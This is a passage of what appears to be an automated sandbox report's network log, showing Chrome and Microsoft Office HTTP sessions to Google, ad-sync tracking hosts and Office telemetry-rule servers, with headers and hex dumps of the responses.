                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-zzjoapEgYqMLgXf-1iO5yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjamDU4pJicNGQYjhx6zbTBSA-73SH6ToQS3x9yaQFxE7pM1hDgLj15jnW6UCc9O88awkQu2tdZPUHYkOFS6zOQOxYdInVE4hVey6xmgPx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1hYgvt10hfUxEAvxcHQf3LyDTeDAtRM9jEoaSfmF8cn5eSVFmUmlJflFaclpqcWpRWWpRfFGBkYmhgYGlnoGRvEFBgC7A0-F"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1930INData Raw: 62 36 64 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 45 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 45 44 2c 5f 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b6dif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var ED=function(a){this.l=_.u(a)};_.y(ED,_.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1002INData Raw: 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 58 79 44 39 4d 63 4a 30 36 61 32 71 54 61 72 54 5a 5a 2d 4c 39 6c 34 5f 42 53 2d 62 73 69 76 76 70 57 55 71 45 79 58 65 78 62 42 6b 4a 45 4b 79 6d 38 54 42 47 48 35 4a 47 57 34 72 51 36 65 38 4d 42 50 74 6c 6c 49 64 65 76 6b 68 4e 57 48 5a 79 2d 78 32 53 6a 64 5a 33 68 77 59 51 53 77 72 47 63 76 31 59 34 33 32 56 2d 59 45 30 51 68 4f 52 38 32 6c 78 6e 67 5f 30 56 57 57 55 5f 49 73 5a 43 6e 5f 74 5f 78 41 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 5c 78 35 64 2c 6e 75 6c 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: com\/f\/AGSKWxXyD9McJ06a2qTarTZZ-L9l4_BS-bsivvpWUqEyXexbBkJEKym8TBGH5JGW4rQ6e8MBPtllIdevkhNWHZy-x2SjdZ3hwYQSwrGcv1Y432V-YE0QhOR82lxng_0VWWU_IsZCn_t_xA\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6\x5d,null,null,null,null,null,null,null,null,null,1\x5d,null
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          143192.168.2.74991713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 470
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 9a6afd11-d01e-0049-3e83-1be7dc000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cfq2j6f03aq9y8dns00000005eg0000000022vq
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          144192.168.2.74992134.117.77.794432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC499OUTGET /csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ml314.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: pi=3647697138334302238
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          expires: Tue, 15 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC49INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2bGIF89a!,D;
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          145192.168.2.74992018.195.70.1004432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC459OUTGET /ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: sync.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Stid: ZHoAA2cM4IQAAAAICdw7Aw==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          146192.168.2.74992218.195.70.1004432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC705OUTGET /eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: sync.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Stid: ZHoAA2cM4IQAAAAICdw7Aw==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          147192.168.2.74992313.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 502
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 54149fda-b01e-0001-69e2-1a46e2000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cfvzwz27u5rnq9kpc00000006f00000000074rb
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          148192.168.2.74992413.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 94508d5b-e01e-0052-6824-1ad9df000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cfbr2wt66emzt78g400000005ug000000000m5r
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          149192.168.2.74992513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:44 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: a84dc0aa-d01e-002b-1b83-1b25fb000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091244Z-17db6f7c8cfbd7pgux3k6qfa60000000055g000000000z1s
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
